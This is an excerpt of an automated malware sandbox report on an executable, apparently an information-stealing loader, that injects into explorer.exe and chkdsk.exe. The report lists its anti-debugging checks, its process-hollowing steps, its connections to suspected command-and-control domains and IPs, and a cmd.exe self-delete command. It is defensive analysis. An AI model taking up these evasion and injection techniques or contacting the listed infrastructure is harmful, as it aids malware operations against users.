          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB513A mov eax, dword ptr fs:[00000030h]10_2_04DB513A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB513A mov eax, dword ptr fs:[00000030h]10_2_04DB513A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]10_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]10_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]10_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]10_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov ecx, dword ptr fs:[00000030h]10_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2ACB mov eax, dword ptr fs:[00000030h]10_2_04DB2ACB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2AE4 mov eax, dword ptr fs:[00000030h]10_2_04DB2AE4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBD294 mov eax, dword ptr fs:[00000030h]10_2_04DBD294
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBD294 mov eax, dword ptr fs:[00000030h]10_2_04DBD294
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9AAB0 mov eax, dword ptr fs:[00000030h]10_2_04D9AAB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9AAB0 mov eax, dword ptr fs:[00000030h]10_2_04D9AAB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBFAB0 mov eax, dword ptr fs:[00000030h]10_2_04DBFAB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]10_2_04D852A5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]10_2_04D852A5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]10_2_04D852A5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]10_2_04D852A5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]10_2_04D852A5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3B260 mov eax, dword ptr fs:[00000030h]10_2_04E3B260
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3B260 mov eax, dword ptr fs:[00000030h]10_2_04E3B260
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58A62 mov eax, dword ptr fs:[00000030h]10_2_04E58A62
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]10_2_04D89240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]10_2_04D89240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]10_2_04D89240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]10_2_04D89240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC927A mov eax, dword ptr fs:[00000030h]10_2_04DC927A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4EA55 mov eax, dword ptr fs:[00000030h]10_2_04E4EA55
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E14257 mov eax, dword ptr fs:[00000030h]10_2_04E14257
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA3A1C mov eax, dword ptr fs:[00000030h]10_2_04DA3A1C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h]10_2_04D85210
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov ecx, dword ptr fs:[00000030h]10_2_04D85210
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h]10_2_04D85210
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h]10_2_04D85210
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8AA16 mov eax, dword ptr fs:[00000030h]10_2_04D8AA16
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8AA16 mov eax, dword ptr fs:[00000030h]10_2_04D8AA16
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D98A0A mov eax, dword ptr fs:[00000030h]10_2_04D98A0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC4A2C mov eax, dword ptr fs:[00000030h]10_2_04DC4A2C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC4A2C mov eax, dword ptr fs:[00000030h]10_2_04DC4A2C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AA16 mov eax, dword ptr fs:[00000030h]10_2_04E4AA16
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AA16 mov eax, dword ptr fs:[00000030h]10_2_04E4AA16
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E053CA mov eax, dword ptr fs:[00000030h]10_2_04E053CA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E053CA mov eax, dword ptr fs:[00000030h]10_2_04E053CA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DADBE9 mov eax, dword ptr fs:[00000030h]10_2_04DADBE9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]10_2_04DB03E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]10_2_04DB03E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]10_2_04DB03E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]10_2_04DB03E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]10_2_04DB03E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]10_2_04DB03E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E55BA5 mov eax, dword ptr fs:[00000030h]10_2_04E55BA5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBB390 mov eax, dword ptr fs:[00000030h]10_2_04DBB390
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2397 mov eax, dword ptr fs:[00000030h]10_2_04DB2397
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D91B8F mov eax, dword ptr fs:[00000030h]10_2_04D91B8F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D91B8F mov eax, dword ptr fs:[00000030h]10_2_04D91B8F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3D380 mov ecx, dword ptr fs:[00000030h]10_2_04E3D380
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4138A mov eax, dword ptr fs:[00000030h]10_2_04E4138A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h]10_2_04DB4BAD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h]10_2_04DB4BAD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h]10_2_04DB4BAD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8F358 mov eax, dword ptr fs:[00000030h]10_2_04D8F358
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8DB40 mov eax, dword ptr fs:[00000030h]10_2_04D8DB40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB3B7A mov eax, dword ptr fs:[00000030h]10_2_04DB3B7A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB3B7A mov eax, dword ptr fs:[00000030h]10_2_04DB3B7A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8DB60 mov ecx, dword ptr fs:[00000030h]10_2_04D8DB60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58B58 mov eax, dword ptr fs:[00000030h]10_2_04E58B58
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4131B mov eax, dword ptr fs:[00000030h]10_2_04E4131B
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00409B40 LdrLoadDll, 3_2_00409B40
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 166.88.62.202 80
          Source: C:\Windows\explorer.exe Domain query: www.casatowerofficial.com
          Source: C:\Windows\explorer.exe Domain query: www.bitconga.com
          Source: C:\Windows\explorer.exe Domain query: www.totalwinerewards.com
          Source: C:\Windows\explorer.exe Network Connect: 199.59.243.200 80
          Source: C:\Windows\explorer.exe Domain query: www.tothelaundry.com
          Source: C:\Windows\explorer.exe Domain query: www.omnipets.store
          Source: C:\Windows\explorer.exe Network Connect: 46.252.151.235 80
          Source: C:\Windows\explorer.exe Network Connect: 18.231.72.25 80
          Source: C:\Windows\explorer.exe Domain query: www.webarate.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Domain query: www.experiencedlawfirms.com
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 90000
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Memory written: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread register set: target process: 3352
          Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 3352
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: explorer.exe, 00000005.00000000.381888349.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.363941533.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.348780458.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.443876033.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman\Pr
          Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.386172183.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.374858871.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.390116935.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356172587.0000000008778000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
